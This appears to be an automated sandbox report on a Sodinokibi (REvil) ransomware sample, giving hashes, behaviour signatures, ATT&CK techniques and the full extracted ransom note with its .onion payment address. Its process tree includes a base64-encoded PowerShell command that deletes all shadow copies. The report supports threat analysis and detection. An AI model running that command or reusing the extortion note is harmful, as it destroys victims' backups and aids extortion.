Overview

overview

10

Static

static

10

43cd585e36...e4.exe

windows7_x64

1

43cd585e36...e4.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    143s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    07-07-2022 21:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe

  • Size

    164KB

  • MD5

    f110035255ecf395f0d5fa1cd89bf15f

  • SHA1

    e60d841b1630f1c6abc0060448ed718a92ec3b56

  • SHA256

    43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4

  • SHA512

    974d4babf66d1cd7d20fe61390b248c2251d403fe15d8e0b2eea29096db4ab83e8488bfbce82dceb725cda11bdd26284656394e8d30fa1cbf592973c8456691a

Score
10/10
sodinokibiransomware

Malware Config

Extracted

Path

C:\60jrl815t1.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 60jrl815t1. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/11FE1E49C1C4B6AB c) Open our secondary website: http://decryptor.top/11FE1E49C1C4B6AB When you open our website, put the following data in the input form: Key: r9GalX9ZAeR5pRNlEKtw42ztALmTZWw/M7vvPgWxNKXyJ2pX+vZBoVS/OQZeO1/T o9CsgzDb2memck6PuoMSb8GArAU47/GWp/mMF25kIpmkpZZs2xUTP/y5lNlcUmdF nrsqDAo+vhxI2McfYeIolDeO5Wmd0GzPL9bRVs56rjr0V9HRHnJaxvISCM6WzAH0 tkkAhArEcC10oBudbFwt7PHWxTluJq082USNdg5yF+YH85g9/Pk9iFI/a6mHORPF Hd54LeB+y9zFD51eCW6MUZwv55FsE2DMvhoH4a/9vN1atigafWPkPi9thvhu4dd7 0zBxqtYDkg9PweTv1vuJSt9O5NPAPhdVGmw5Dk/hZFEncZPPwWksKwXirm8XOqOb fYPfGixP0L91RrXlGvXr8FKcDqGuJ368npfRoXM5EENO+VI3LQTldPdTOw526OpZ 9+i8HZMRjhjea3cygkrXKGP4TkY4g3eyaRS2Wz3j8iEdkmOqzVn5XJOii28BK3nM z5sh26pX/V1NtYsyxJB0uf88d2p08a0TAcaoYkcf9pCEaitwsUnWZbN4q/+V6wtR NKd2KglsCG5BVGRwy0Z0T3ptDR/OrUNuKXzr7dUWDjdvzUbopxn2P6n9TfoUWzwv yhyLhFk0/vPm26TA+uGqOwYqrYO39NZCvoL3UseCtFr2dMj2ClG/mhu1BEhtQJfn RwVuGgzYEbvPhk6rT7rfNDwONEUmd+2nbc71Y0AvHmTQ+AqtJ4e7DfcbCpNpD+d/ hvv600R1W+NXRwY+ihwdTUnaN7ym8/9ggfekqu6Stfl3EpI77iyRvWWnnfaIZDoR YRUo47WcxkgAOv44pvU2xWWK8IslY7c7hXfMuSolg8OGxgSuAbqWVE9x+D0YB1Hq rKSNijJf5OYmrNXgzm2hE6shGqNK4nwAjOEqNarJZWQA1gez7KqMb0Er9Tq+v9oK TNK1SETs0v4gw0W2bMDLjIdIWwaqLng+pFVSmxVt+KX3wXtjJ8kbmgx2ipgomxwd 6L8PqZe1EO+Koia2mRqZ/KlW3srgkzQsdM2QJ9zM26OzWC/WcA2eplNw7x3JvXNv 5k+mbmcGdKgCCCce1rPGL69SUQJrS4xh572Dsk2bE7K71T2PVCUOYKto09ksmp1g ccOYL40sLaGifjd/dgE= Extension name: 60jrl815t1 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/11FE1E49C1C4B6AB

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 30 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe
    "C:\Users\Admin\AppData\Local\Temp\43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4696
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3512
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1892

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4696-130-0x0000000000000000-mapping.dmp
      Download
    • memory/4696-131-0x00000256385D0000-0x00000256385F2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4696-132-0x00007FFB09AA0000-0x00007FFB0A561000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4696-133-0x00007FFB09AA0000-0x00007FFB0A561000-memory.dmp
      Filesize

      10.8MB

      Download